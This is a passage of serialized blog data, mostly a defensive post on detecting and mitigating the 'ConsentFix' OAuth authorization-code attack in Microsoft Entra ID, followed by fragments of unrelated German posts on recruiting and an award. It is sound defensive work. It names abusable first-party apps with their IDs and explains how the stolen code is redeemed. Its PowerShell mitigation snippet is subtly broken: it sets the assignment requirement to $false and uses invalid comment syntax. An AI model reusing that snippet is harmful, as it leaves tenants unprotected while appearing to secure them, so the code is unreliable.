link",[806,5633,5634],{},"When looking for a good way to link those two events, the natural first idea was to check the Unique Token Identifier (UTI). However, Microsoft uses different values for the authorization code UTI and the bearer token UTI, so this approach doesn't work as a reliable link.",[806,5636,5637],{},[1449,5638],{"alt":5639,"src":5640},"Unique Token Identifier","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-06.png",[806,5642,5643,5644,5647],{},"However, the ",[1524,5645,5646],{},"SessionId"," is a good link between the two, though it is a long-running ID and might contain multiple of these event combinations, even legitimate ones.",[806,5649,5650],{},"With the additional knowledge of the auth code flow limitations and the user and application id as additional links you can use time as an important detection factor:",[2738,5652,5653,5656,5659,5662,5665,5668],{},[2741,5654,5655],{},"Both events share the same SessionId",[2741,5657,5658],{},"Both events share the same ApplicationId",[2741,5660,5661],{},"Both events share the same UserId",[2741,5663,5664],{},"The second event must be after the first event",[2741,5666,5667],{},"The second event must be within approximately a 10-minute time window after the first event. You should not use exactly 10 minutes as Microsoft writes \"[...] they expire after about 10 minutes\"",[2741,5669,5670],{},"You should only consider the very next second event, not subsequent ones",[3587,5672,5673],{},[806,5674,5675,5678,5680],{},[1736,5676,5677],{},"Fun fact",[2016,5679],{},"\nThe ResourceIdentity is not a good link, as the attacker can change the resource since it is not bound to the auth code. The targeted application ID cannot be changed.",[810,5682,5684],{"id":5683},"reduce-the-noise","Reduce the noise",[806,5686,5687],{},"This knowledge already provided us with a good working detection, but there were benign positives in the mix as well. Modern developers use cloud resources that appear like local instances, but result in irregular login patterns in the logs.",[806,5689,5690],{},"The key difference is the time component. While the attack requires user interaction to copy and paste or drag and drop the URI, the GitHub Codespace use case we identified as the source of the benign positive alerts is completely automated and redeems the auth code within mere seconds.",[806,5692,5693],{},"So filtering out anything that does this authentication dance within a few seconds can most likely be removed as benign.",[806,5695,5696],{},"Another source of noise could be changing egress points for your internet traffic, especially in SD-WAN, ZTNA or Secure Web Gateway scenarios.",[810,5698,5700],{"id":5699},"affected-first-party-applications","Affected first-party applications",[806,5702,5703],{},"While the initial report shows \"Microsoft Azure CLI\" as the abused application there are a lot of different Microsoft first-party apps with pre-consent in every tenant that offer localhost as redirect. And not only those are a target. The attacker could also abuse reply test and dev URLs that are not publicly resolvable.",[806,5705,5706],{},"Here is a list of the most notable applications that also have high pre-consentet permissions on resources.",[2738,5708,5709,5712,5715,5718,5721],{},[2741,5710,5711],{},"Microsoft Azure CLI (04b07795-8ddb-461a-bbee-02f9e1bf7b46)",[2741,5713,5714],{},"Microsoft Azure PowerShell (1950a258-227b-4e31-a9cf-717495945fc2)",[2741,5716,5717],{},"Visual Studio (04f0c124-f2bc-4f59-8241-bf6df9866bbd)",[2741,5719,5720],{},"Visual Studio Code (aebc6443-996d-45c2-90f0-388ff96faa56)",[2741,5722,5723],{},"MS Teams PowerShell Cmdlets (12128f48-ec9e-42f0-b203-ea49fb6af367)",[806,5725,5726,5727,5732],{},"A full list of these apps are now included in ",[833,5728,5731],{"href":5729,"rel":5730},"https://entrascopes.com/?authcodeFix=true",[1410],"EntraScopes.com"," by our colleague Fabian Bader.",[810,5734,5736],{"id":5735},"mitigations-and-protections","Mitigations and Protections",[1671,5738,5740],{"id":5739},"limit-the-attack-surface-and-audience","Limit the attack surface and audience",[1541,5742,5745,5748,5749,5751,5754,5755,5757,5760],{"className":5743},[5744],"option-block",[1736,5746,5747],{},"Deployment effort:"," Low to High (depends on effort to identify legitimate users)",[2016,5750],{},[1736,5752,5753],{},"Mitigation:"," Medium (reduces the potential audience for the attack)",[2016,5756],{},[1736,5758,5759],{},"Scope:"," limited\n",[1671,5762,5764],{"id":5763},"option-1-require-user-assignment","Option 1: Require User Assignment",[5766,5767,5769],"h4",{"id":5768},"pre-requisites","Pre-requisites:",[2738,5771,5772,5775,5778],{},[2741,5773,5774],{},"Add the service principal for affected first-party apps by using Microsoft Graph API or PowerShell",[2741,5776,5777],{},"Apply the user assignment requirement on the service principal object using Microsoft Graph API or PowerShell",[2741,5779,5780],{},"Establish a process to assign users upon request via Access Packages, PIM-for-Groups (for just-in-time access), or a combination of both.",[3604,5782,5783],{},"\n.code-block {\n background-color: #f6f8fa;\n padding: 0 16px 16px 16px;\n border-radius: 6px;\n font-family: Menlo, Consolas, Monaco, \"Courier New\", monospace;\n font-size: 14px;\n line-height: 1.5;\n overflow-x: auto;\n white-space: pre;\n border: 1px solid #d0d7de;\n}\n",[1545,5785,5787],{"className":5786},[2009],[1524,5788,5789],{},"\n// Example for Microsoft Graph PowerShell\nConnect-MgGraph -Identity\n$AppId = \"04b07795-8ddb-461a-bbee-02f9e1bf7b46\" // Microsoft Azure CLI\n$sp = Get-MgServicePrincipal -Filter \"appId eq '$AppId'\"\nUpdate-MgServicePrincipal -ServicePrincipalId $sp.Id -AppRoleAssignmentRequired:$false\n",[5766,5791,5793],{"id":5792},"benefit","Benefit:",[2738,5795,5796,5799,5802,5805],{},[2741,5797,5798],{},"Enables management of user assignments through Access Packages or manual group membership to limit exposure to this attack technique.",[2741,5800,5801],{},"Option to provide just-in-time access combined with eligible group membership assignment, allowing temporary access to CLI tools and thereby further reducing the attack surface.",[2741,5803,5804],{},"Applied before evaluating Conditional Access policies.",[2741,5806,5807],{},"Limits the attack surface for other scenarios as well.",[5766,5809,5811],{"id":5810},"disadvantage","Disadvantage:",[2738,5813,5814,5817,5820],{},[2741,5815,5816],{},"Can only be scoped to specific users and not combined with other requirements like usage of specific devices",[2741,5818,5819],{},"All legitimate CLI tool users must be identified",[2741,5821,5822],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins.",[1671,5824,5826],{"id":5825},"option-2-block-access-by-using-conditional-access-policies","Option 2: Block access by using Conditional Access Policies",[5766,5828,5769],{"id":5829},"pre-requisites-1",[2738,5831,5832,5835],{},[2741,5833,5834],{},"Create a Conditional Access policy to block access to CLI tools, excluding legitimate users, by targeting \"Microsoft Graph Command Line Tools\" and \"Windows Azure Service Management API\"",[2741,5836,5837],{},"Manage exclusions via group membership, either manually or through entitlement management (e.g., Access Packages).",[5766,5839,5793],{"id":5840},"benefit-1",[2738,5842,5843,5846],{},[2741,5844,5845],{},"Prevents token issuance for non-legitimate or non-privileged users.",[2741,5847,5848],{},"Allows granular scoping based on additional conditions such as device or network.",[5766,5850,5811],{"id":5851},"disadvantage-1",[2738,5853,5854,5857],{},[2741,5855,5856],{},"All legitimate CLI tool users must be identified and excluded.",[2741,5858,5859],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode.",[1671,5861,5863],{"id":5862},"block-token-issuance-by-authorization-code-flow","Block token issuance by authorization code flow",[3604,5865,5866],{},"\n.option-block {\n background-color: #f6f8fa;\n padding: 16px;\n margin-bottom:2rem;\n border-radius: 6px;\n overflow-x: auto;\n border: 1px solid #d0d7de;\n}\n",[1541,5868,5870,5873,5874,5876,5878,5879,5881,5878,5883,5885,5887],{"className":5869},[5744],[1736,5871,5872],{},"Option:"," Require Token Protection",[2016,5875],{},[1736,5877,5747],{}," High",[2016,5880],{},[1736,5882,5753],{},[2016,5884],{},[1736,5886,5759],{}," Very limited\n",[5766,5889,5769],{"id":5890},"pre-requisites-2",[2738,5892,5893,5896,5899,5918],{},[2741,5894,5895],{},"Microsoft Entra ID P1 licenses",[2741,5897,5898],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows platform",[2741,5900,5901,5902,2289,5907,5611,5912,5917],{},"Enable Web Account Manager (WAM) in ",[833,5903,5906],{"href":5904,"rel":5905},"https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli-interactively?view=azure-cli-latest#sign-in-with-web-account-manager-wam-on-windows",[1410],"Azure CLI",[833,5908,5911],{"href":5909,"rel":5910},"https://learn.microsoft.com/en-us/powershell/azure/configure-global-settings?view=azps-15.1.0#web-account-manager-wam",[1410],"Azure PowerShell",[833,5913,5916],{"href":5914,"rel":5915},"https://learn.microsoft.com/en-us/powershell/module/microsoft.graph.authentication/set-mggraphoption?view=graph-powershell-1.0#set-web-account-manager-support",[1410],"Microsoft Graph PowerShell"," (default in latest versions)",[2741,5919,5920,5921],{},"Configure Conditional Access targeting:\n",[2738,5922,5923,5937,5944],{},[2741,5924,5925,5926],{},"Cloud App targeting to the following apps:\n",[2738,5927,5928,5931,5934],{},[2741,5929,5930],{},"Office 365 Exchange Online",[2741,5932,5933],{},"Office 365 SharePoint Online",[2741,5935,5936],{},"Microsoft Teams Services",[2741,5938,5939,5940,5943],{},"Client apps under ",[4655,5941,5942],{},"Mobile apps and desktop clients"," to require Token Protection.",[2741,5945,5946,5947,5950,5951,5954],{},"Select ",[4655,5948,5949],{},"Windows"," as ",[4655,5952,5953],{},"device platform"," for targeting the policy",[5766,5956,5793],{"id":5957},"benefit-2",[806,5959,5960],{},"Microsoft Entra’s token protection requires proof‑of‑possession (PoP), which can only be enforced when the client communicates directly with a trusted token broker such as the Web Account Manager (WAM) on Windows. Because browsers cannot establish this secure channel, the authorization code flow initiated in a browser is blocked under token protection policies.",[806,5962,5963],{},"When the policy enforces token protection that requires broker‑managed PoP, the authorization code returned to a browser cannot be redeemed because the browser cannot produce the required broker‑signed proof during the code to token exchange",[806,5965,5966],{},"In this case, attacks with AuthCodeFix will be fully mitigated as long the application can be protected by Token Protection.",[806,5968,5969],{},"As shown in the screenshot below, Token Protection successfully mitigates the redemption of the authorization code flow initiated by the victim through a phishing action.",[806,5971,5972],{},[1449,5973],{"alt":5974,"src":5975},"Token Protection successfully mitigates the redemption of the authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-07.png",[5766,5977,5811],{"id":5978},"disadvantage-2",[2738,5980,5981,6011,6014,6017],{},[2741,5982,5983,5984],{},"Only the following resources are officially supported:\n",[2738,5985,5986,5988,5990],{},[2741,5987,5930],{},[2741,5989,5933],{},[2741,5991,5936,5992,5994,5996,5997,5611,6000,6004,6005,6010],{},[2016,5993],{},[2016,5995],{},"\nThe Microsoft Graph API is indirectly covered by the previously mentioned resources and Microsoft Graph PowerShell is listed as a supported client. We were able to verify in our testing that the attack for this scenario will be mitigated. “Windows Azure Service Management API\" is not listed as a supported resource. Both CLI clients (",[833,5998,5906],{"href":5904,"rel":5999},[1410],[833,6001,5911],{"href":6002,"rel":6003},"https://learn.microsoft.com/en-us/powershell/azure/authenticate-interactive?view=azps-15.1.0#benefits-of-wam",[1410],") support WAM which is a client-side requirement to use Token Protection. Microsoft has been announced ",[833,6006,6009],{"href":6007,"rel":6008},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/how-to-break-the-token-theft-cyber-attack-chain/4062700",[1410],"in a blog post"," to extend token protection capabilities for Azure management scenarios.",[2741,6012,6013],{},"Some bugs in Microsoft Graph PowerShell force you to temporarily disable WAM integration",[2741,6015,6016],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode. The cloud app targeting will also effect productivity access to Microsoft 365.",[2741,6018,6019],{},"Limited scope due to availability on supported platforms and Entra ID–integrated devices.",[1671,6021,6023],{"id":6022},"block-further-token-issuance-by-compliant-network-check-or-trusted-network","Block further token issuance by compliant network check or trusted network",[1541,6025,6027,6029,6030,6032,6029,6034,6036,6038],{"className":6026},[5744],[1736,6028,5747],{}," Medium",[2016,6031],{},[1736,6033,5753],{},[2016,6035],{},[1736,6037,5759],{}," Broad\n",[1671,6040,6042],{"id":6041},"option-block-access-outside-of-compliant-network-with-global-secure-access","Option: Block access outside of Compliant network with Global Secure Access",[5766,6044,6046],{"id":6045},"pre-requisite","Pre-requisite:",[2738,6048,6049,6052,6055,6058],{},[2741,6050,6051],{},"Entra ID P1 license",[2741,6053,6054],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows, macOS, Androind and iOS platform",[2741,6056,6057],{},"Global Secure Access Client on all affected clients and enabled Entra Internet Access for M365 Traffic Profile",[2741,6059,6060],{},"Conditional Access Policy to enforce network compliant check should be applied to all cloud apps",[5766,6062,5793],{"id":6063},"benefit-3",[806,6065,6066],{},"Block additional token issuance by enforcing a trusted network check. This mitigation ensures attackers cannot obtain new tokens using the refresh token from the authorization code flow. However, it does not prevent the initial redemption of the authorization code or the issuance of the first access token, which remains valid outside the compliant network because it was originally requested by the victim.",[3587,6068,6069],{},[806,6070,6071],{},"Enforcing GSA with the Compliant Network condition also blocks other Token Replay scenarios and adds additional logs which can be very useful for detections and hunting.",[5766,6073,5811],{"id":6074},"disadvantage-3",[2738,6076,6077,6080,6083],{},[2741,6078,6079],{},"Only applicable for users and devices with deployed Global Secure Access client",[2741,6081,6082],{},"Limited scope due to availability on Entra ID–integrated devices",[2741,6084,6085],{},"Enforcing Compliant Networks via CA will need some Exclusions like Intune to avoid chicken-egg-problems. Detailed testing is needed before rollout",[810,6087,6089],{"id":6088},"hunting-queries","Hunting queries",[806,6091,6092,6093,6096],{},"Once all the prerequisites for token theft mitigations are met - such as deploying the GSA client (including ingestion of ",[1524,6094,6095],{},"NetworkAccessTraffic"," logs) and taking benefit of WAM authentication - we gain additional options for threat hunting and verification.",[1671,6098,6100],{"id":6099},"leveraging-gsa-logs-and-wam-authentication-for-hunting-or-verify-confidence-on-detection-results","Leveraging GSA Logs and WAM Authentication for hunting or verify confidence on detection results",[806,6102,6103,6104,6106],{},"This hunting query leverages ",[1524,6105,6095],{}," logs from Global Secure Access (GSA), which include the initiating process for communication with the Microsoft Entra token endpoint. This helps determine whether a token request originated directly from a browser and also whether any additional token requests were made outside the GSA network.",[3587,6108,6109],{},[806,6110,6111],{},"This query works and delivers only reliable results when the prerequisites are met; otherwise, it leads to a high false-positive rate.",[806,6113,6114,6117,6118,6121,6122,6125],{},[1736,6115,6116],{},"Why this matters:"," When signing in via CLI or PowerShell modules using Web Account Manager (WAM) on Windows Devices, the flow does not involve a browser-based authorization code. This sign-in behavior is the default in the latest version. Therefore, if the initiating process is a browser executable (e.g., ",[1524,6119,6120],{},"msedge.exe","), this is a strong indicator of suspicious activity. On macOS, the process is initiated by the Company Portal app (",[1524,6123,6124],{},"com.microsoft.CompanyPortalMac.ssoextension",") when using Platform SSO.",[806,6127,6128,6131],{},[1736,6129,6130],{},"Token Binding and PoP:"," WAM authentication typically binds tokens to the device by enforcing Proof-of-Possession (PoP). Attackers cannot issue further bounded tokens without PoP, so an unbounded refresh token is another strong indicator.",[806,6133,6134,6137],{},[1736,6135,6136],{},"Limitations:"," All the mentioned signals are only available when the accessing device is registered with or joined to Microsoft Entra ID.",[806,6139,6140,6143],{},[1736,6141,6142],{},"Confidence Score Logic:"," The query combines multiple signals to calculate a confidence score:",[2738,6145,6146,6149,6152],{},[2741,6147,6148],{},"Presence of a browser process initiating token requests.",[2741,6150,6151],{},"Detection and down grade to unbounded tokens.",[2741,6153,6154],{},"Network provider changes (including Compliant to non-compliant) between sign-ins.",[806,6156,6157],{},"These signals can be used in the query to hunt for activity or to derive a confidence score in the event of an incident based on the previous detection.",[806,6159,6160],{},[1449,6161],{"alt":6162,"src":6163},"Signals for the hunting query","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-08.png",[806,6165,6166],{},"The following scoring will be shown depending on the conditions:",[806,6168,6169,6172,6173,6175,6176,6178,6180,6183,6184,6186,6188,6191],{},[1736,6170,6171],{},"A very high confidence score"," is displayed when ",[1524,6174,6095],{}," logs indicate a familiar browser process instead of initiating a token request, and a downgrade of an unbound token has been detected.",[2016,6177],{},[2016,6179],{},[1736,6181,6182],{},"A high confidence score"," is shown when the sign-in occurs from a different Network Provider (ASN) and a non-compliant network involving unbound tokens.",[2016,6185],{},[2016,6187],{},[1736,6189,6190],{},"A medium confidence score"," is shown when only a change in Network Provider and compliant network is identified, along with a change in the token type used.",[806,6193,6194,6195,2786],{},"You’ll find the latest version of the hunting query on ",[833,6196,6199],{"href":6197,"rel":6198},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-Authentication/ConsentFix-HuntingConfidenceOnTokenAndNetworkSignals.kusto",[1410],"GitHub",[1671,6201,6203],{"id":6202},"hunting-for-activities-by-issued-tokens","Hunting for activities by issued tokens",[806,6205,6206,6207,6212,6213,6216,6217,6219,6220,6223],{},"You should consider expanding your investigation beyond sign-in events to include activities performed using tokens issued by the attacker. Our colleague Thomas Naunheim has ",[833,6208,6211],{"href":6209,"rel":6210},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-TokenHunting/MicrosoftCloudActivity.func",[1410],"published a KQL function"," called ",[1524,6214,6215],{},"MicrosoftCloudActivity",", which can assist in this extended hunting process. Additionally, the affected ",[1524,6218,5646],{}," can be correlated with suspicious ",[1524,6221,6222],{},"UniqueId"," values identified during previous hunts for deeper analysis.",[806,6225,6226],{},[1449,6227],{"alt":6228,"src":6229},"KQL function","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-09.png",[806,6231,6232],{},"In this example, the attacker leveraged the refresh token obtained during the attack to issue an access token for the Microsoft Graph API. This token was then used to maintain persistent access and lateral movement by adding a client secret to an application owned by the victim. The query provides details about the Graph API operation, including the token protection status and whether the operation occurred outside the Global Secure Access network.",[806,6234,6235],{},[1449,6236],{"alt":6237,"src":6238},"Graph API operation screenshot","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-10.png",[810,6240,6242],{"id":6241},"further-reading","Further Reading",[2738,6244,6245,6252,6259,6266],{},[2741,6246,6247],{},[833,6248,6251],{"href":6249,"rel":6250},"https://pushsecurity.com/blog/consentfix",[1410],"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants - PushSecurity",[2741,6253,6254],{},[833,6255,6258],{"href":6256,"rel":6257},"https://youtu.be/AAiiIY-Soak",[1410],"Hacking Endpoint to Identity (Microsoft 365): \"ConsentFix\" - YouTube",[2741,6260,6261],{},[833,6262,6265],{"href":6263,"rel":6264},"https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow",[1410],"Microsoft identity platform and OAuth 2.0 authorization code flow",[2741,6267,6268],{},[833,6269,6272],{"href":6270,"rel":6271},"https://entrascopes.com/?appId=04b07795-8ddb-461a-bbee-02f9e1bf7b46",[1410],"Microsoft Azure CLI on entrascpes.com",{"title":863,"searchDepth":864,"depth":864,"links":6274},[6275,6278,6279,6280,6288,6292],{"id":5603,"depth":864,"text":5604,"children":6276},[6277],{"id":5630,"depth":1814,"text":5631},{"id":5683,"depth":864,"text":5684},{"id":5699,"depth":864,"text":5700},{"id":5735,"depth":864,"text":5736,"children":6281},[6282,6283,6284,6285,6286,6287],{"id":5739,"depth":1814,"text":5740},{"id":5763,"depth":1814,"text":5764},{"id":5825,"depth":1814,"text":5826},{"id":5862,"depth":1814,"text":5863},{"id":6022,"depth":1814,"text":6023},{"id":6041,"depth":1814,"text":6042},{"id":6088,"depth":864,"text":6089,"children":6289},[6290,6291],{"id":6099,"depth":1814,"text":6100},{"id":6202,"depth":1814,"text":6203},{"id":6241,"depth":864,"text":6242},{"lang":4,"seoTitle":6294,"titleClass":873,"date":6295,"categories":6296,"blogtitlepic":6297,"socialimg":6298,"customExcerpt":6299,"keywords":6300,"hreflang":6301,"scripts":6306,"asideNav":6307,"maxContent":508,"published":508},"ConsentFix: How a New OAuth Attack Bypasses Microsoft Entra Conditional Access","2025-12-31",[371],"head-consentfix","/heads/head-consentfix.jpg","Just before year's end, ConsentFix emerges: a clever OAuth-based attack that abuses legitimate authentication flows to steal the authorization code, effectively handing attackers the keys to Microsoft Entra. We break down why this works despite Conditional Access, which signals it leaves behind in the logs, and how defenders can detect and stop it before real damage is done.","ConsentFix attack, OAuth authorization code theft, Microsoft Entra OAuth attack, Azure CLI token abuse, Entra ID Conditional Access bypass, authorization code phishing, token replay attack Azure, Proof of Possession tokens, WAM authentication security, Azure sign-in log analysis, detect OAuth attacks Entra, Azure identity threat hunting, Global Secure Access token protection, Microsoft Entra security detection",[6302,6304],{"lang":4,"href":6303},"/de/posts/2025-12-31-vulnerability-consentfix",{"lang":956,"href":6305},"/es/posts/2025-12-31-vulnerability-consentfix",{"slick":508,"form":508},{"menuItems":6308},[6309,6311,6313,6315,6317,6319],{"href":6310,"text":5604},"#detection-artifacts",{"href":6312,"text":5684},"#reduce-the-noise",{"href":6314,"text":5700},"#affected-first-party-applications",{"href":6316,"text":5736},"#mitigations-and-protections",{"href":6318,"text":6089},"#hunting-queries",{"href":6320,"text":6242},"#further-reading","/posts/2025-12-31-vulnerability-consentfix",{"title":5508,"description":5514},"posts/2025-12-31-vulnerability-consentfix",[6325,6326,432],"OAuth 2.0","Microsoft Entra ID","XvJUqR9SZe2cwDgWD9NSLNg9R7zTOjKgxmJFBjxBTX4",{"id":6329,"title":6330,"author":6331,"body":6332,"cta":764,"description":6336,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":6433,"moment":6435,"navigation":508,"path":6447,"seo":6448,"stem":6449,"tags":6450,"webcast":749,"__hash__":6452},"content_de/posts/2025-12-08-recruiting-process.md","Ein Teil vom Glück: So läuft unser Bewerbungs­prozess ab",[1243],{"type":803,"value":6333,"toc":6425},[6334,6337,6340,6343,6354,6358,6360,6363,6366,6370,6372,6375,6386,6389,6393,6395,6398,6402,6404,6407,6411,6413,6416,6420,6422],[806,6335,6336],{},"Oft werden wir gefragt: Was muss ich mitbringen? Was ist euch wichtig?",[806,6338,6339],{},"Vielleicht so viel: Wir mögen Menschen, die Lust haben, in einer Tech-Welt unterwegs zu sein, die sich jeden Tag ein Stück weiterdreht. Wir sehen uns als ein Team, das gemeinsam an einem Strang zieht.",[806,6341,6342],{},"Und wir suchen Menschen, die Technik genauso begeistert wie uns:",[2738,6344,1905,6345,1905,6348,1905,6351],{},[2741,6346,6347],{},"die Herausforderungen nicht scheuen, sondern darin aufgehen, wenn sie tief in komplexe Themen eintauchen können.",[2741,6349,6350],{},"die den Status Quo hinterfragen und mit Leidenschaft neue, innovative Lösungen entwickeln für glueckkanja und unsere Kunden.",[2741,6352,6353],{},"die gerne Teil einer Community sind, ihr Wissen teilen und voneinander lernen möchten.",[810,6355,6357],{"id":6356},"schritt-1-deine-bewerbung","Schritt 1: Deine Bewerbung",[806,6359,816],{},[806,6361,6362],{},"Du hast deine Unterlagen abgeschickt, der erste Schritt ist getan! Bei uns prüft keine KI deine Bewerbung, sondern unser Recruiting-Team persönlich. Du fragst dich, wer sich hinter dem Recruiting Team verbirgt? Here we are!",[806,6364,6365],{},"Wir, das sind Kerstin, Anna, Steffi und Jan, nehmen uns Zeit, deinen CV genau anzuschauen und prüfen, ob deine Erfahrung und Skills zu unseren Anforderungen passen. Unser Ziel: Du bekommst innerhalb von 1-2 Wochen, meistens sogar schon nach ein paar Tagen, eine Rückmeldung von uns. Wir wissen, wie nervenaufreibend das Warten sein kann.",[810,6367,6369],{"id":6368},"schritt-2-kennenlernen-mit-people-culture","Schritt 2: Kennenlernen mit People & Culture",[806,6371,816],{},[806,6373,6374],{},"Wenn dein Profil passt, starten wir in die erste Runde. Keine Sorge, du musst nicht nervös sein! Du hast mit deinem CV bereits einen super ersten Eindruck hinterlassen. Im Gespräch möchten wir dich als Person kennenlernen:",[2738,6376,1905,6377,1905,6380,1905,6383],{},[2741,6378,6379],{},"Wer bist du?",[2741,6381,6382],{},"Was macht dich aus?",[2741,6384,6385],{},"Was suchst du für deine Zukunft?",[806,6387,6388],{},"Hier geht es um ein offenes, ehrliches Kennenlernen auf Augenhöhe.\n ",[810,6390,6392],{"id":6391},"schritt-3-fachlicher-austausch-mit-deinem-zukünftigen-lead","Schritt 3: Fachlicher Austausch mit deinem zukünftigen Lead",[806,6394,816],{},[806,6396,6397],{},"Im zweiten Gespräch lernst du deinen Lead kennen. Jetzt wird es etwas technischer: Wir sprechen über deine fachlichen Skills und du kannst alle Fragen zu Aufgaben, Team und Projekten stellen. Ein bisschen Aufregung gehört dazu – aber hey, du bist schon einen Schritt weiter!",[810,6399,6401],{"id":6400},"schritt-4-team-meet-culture-check","Schritt 4: Team-Meet & Culture Check",[806,6403,816],{},[806,6405,6406],{},"Bei glueckkanja ist Kultur mehr als ein Wort. Sie ist unser Alltag. Deshalb lernst du im letzten Step dein mögliches Team kennen. So stellen wir sicher, dass es für beide Seiten passt, fachlich wie menschlich.",[810,6408,6410],{"id":6409},"finale-dein-angebot","Finale: Dein Angebot",[806,6412,816],{},[806,6414,6415],{},"Du hast uns überzeugt? Dann folgt das persönliche Angebotsgespräch. Hier klären wir alle Details zum Angebot und beantworten deine abschließenden Fragen.",[810,6417,6419],{"id":6418},"warum-so-viele-schritte","Warum so viele Schritte?",[806,6421,816],{},[806,6423,6424],{},"Ganz einfach: Wir möchten sicherstellen, dass du dich bei uns wohlfühlst und wir gemeinsam erfolgreich sind. Unsere Gespräche finden immer auf Augenhöhe statt – und das „Du“ ist bei uns selbstverständlich.",{"title":863,"searchDepth":864,"depth":864,"links":6426},[6427,6428,6429,6430,6431,6432],{"id":6356,"depth":864,"text":6357},{"id":6368,"depth":864,"text":6369},{"id":6391,"depth":864,"text":6392},{"id":6400,"depth":864,"text":6401},{"id":6409,"depth":864,"text":6410},{"id":6418,"depth":864,"text":6419},{"lang":4,"seoTitle":6434,"titleClass":873,"date":6435,"categories":6436,"blogtitlepic":6437,"socialimg":6438,"customExcerpt":6439,"keywords":6440,"hreflang":6441,"scripts":6446},"Ein Teil vom Glück: So läuft der Bewerbungsprozess bei glueckkanja ab","2025-12-08",[876],"head-recruiting-process","/heads/head-recruiting-process.png","Du hast eine spannende Stelle bei uns entdeckt und möchtest dich bewerben? Super, wir freuen uns immer über neue Talente! Aber wie geht es nach dem Klick auf „Bewerbung absenden“ weiter? Hier geben wir dir einen Blick hinter die Kulissen.","Bewerbungsprozess glueckkanja, Recruiting IT Unternehmen, IT Jobs Deutschland, Karriere glueckkanja, Employer Branding IT, Bewerbung IT Branche, Tech Jobs, Recruiting Prozess IT, Arbeiten bei glueckkanja, IT Karriere, Talent Acquisition IT, People and Culture IT, Bewerbungsgespräch Tipps IT",[6442,6444],{"lang":953,"href":6443},"/en/posts/2025-12-08-recruiting-process.md",{"lang":956,"href":6445},"/es/posts/2025-12-08-recruiting-process.md",{"slick":508,"form":508},"/posts/2025-12-08-recruiting-process",{"title":6330,"description":6336},"posts/2025-12-08-recruiting-process",[1488,6451,1489],"Recruiting","MYU2dWOGbcnNm1z_SeJp7Ezgj4blki_92PJsGrB5vD4",{"id":6454,"title":6455,"author":6456,"body":6457,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":6535,"moment":6537,"navigation":508,"path":6582,"seo":6583,"stem":6584,"tags":6585,"webcast":749,"__hash__":6587},"content_de/posts/2025-11-12-partner-of-the-year-awards.md","Cloud-first am Flughafen: Microsoft Partner of the Year Awards 2025",[801],{"type":803,"value":6458,"toc":6529},[6459,6463,6465,6468,6471,6475,6477,6480,6483,6497,6500,6503,6507,6509,6512,6516,6518,6521],[810,6460,6462],{"id":6461},"vom-rollfeld-in-die-cloud","Vom Rollfeld in die Cloud",[806,6464,816],{},[806,6466,6467],{},"Fraport betreibt 29 Flughäfen weltweit, darunter den Flughafen Frankfurt – einen der größten Verkehrsknotenpunkte Europas. Mehr als 80.000 Mitarbeitende halten dort täglich den Betrieb am Laufen: von der Gepäckabfertigung bis zur IT-Sicherheit. Damit diese Abläufe funktionieren, braucht es eine verlässliche, skalierbare und sichere digitale Infrastruktur.",[806,6469,6470],{},"Genau hier setzte das gemeinsame Projekt von Fraport und glueckkanja an: Die bestehende VDI-Umgebung sollte durch eine moderne, cloudbasierte Arbeitsplatzarchitektur ersetzt werden. Das Ziel: mehr Flexibilität, weniger Komplexität, und eine Plattform, die auf die Anforderungen einer global vernetzten Organisation zugeschnitten ist.",[810,6472,6474],{"id":6473},"cloud-managed-workplace","Cloud Managed Workplace",[806,6476,816],{},[806,6478,6479],{},"Im Zentrum steht die Kombination aus Windows 365 Cloud PCs und der Microsoft Intune Suite. Mehr als 16.500 Endpoints werden heute zentral bereitgestellt, verwaltet und abgesichert.",[806,6481,6482],{},"Das Ergebnis:",[2738,6484,6485,6488,6491,6494],{},[2741,6486,6487],{},"Gerätebereitstellung in Minuten statt Stunden",[2741,6489,6490],{},"Automatisierte Prozesse für mehr Effizienz",[2741,6492,6493],{},"Transparente Verwaltung und Monitoring",[2741,6495,6496],{},"Zero-Trust-Sicherheitsmodell über alle Geräte hinweg",[806,6498,6499],{},"So entsteht ein Arbeitsplatzkonzept, das Fraports Mitarbeitenden sichere und flexible Arbeit über alle Standorte, Endgeräte und Rollen hinweg ermöglicht.",[1432,6501],{":quotes":6502,":no-fullscreen":1435,"spacing":1436},"quoteMicrosoft",[810,6504,6506],{"id":6505},"anerkennung-für-innovation-und-zusammenarbeit","Anerkennung für Innovation und Zusammenarbeit",[806,6508,816],{},[806,6510,6511],{},"Mit den Microsoft Partner of the Year Awards zeichnet Microsoft jedes Jahr Partnerunternehmen aus, die herausragende Cloud-Lösungen, Services und Innovationen entwickeln und umsetzen. In einem globalen Wettbewerb aus mehr als 4.600 Einreichungen wurde glueckkanja für die erfolgreiche Umsetzung des Fraport-Projekts hervorgehoben, ein starkes Zeichen für die Relevanz cloudbasierter Arbeitsplatzlösungen in kritischen Infrastrukturen.",[810,6513,6515],{"id":6514},"ein-blueprint-für-moderne-arbeitsplatzarchitektur","Ein Blueprint für moderne Arbeitsplatzarchitektur",[806,6517,816],{},[806,6519,6520],{},"Das Projekt zeigt, wie sich komplexe Infrastrukturen mit der Cloud neu denken lassen, ohne dabei Kompromisse bei Sicherheit oder Benutzerfreundlichkeit einzugehen. Für Fraport war es der Schritt zu einem standardisierten, cloudbasierten Arbeitsplatzmodell. Für glueckkanja ist es ein Beispiel dafür, 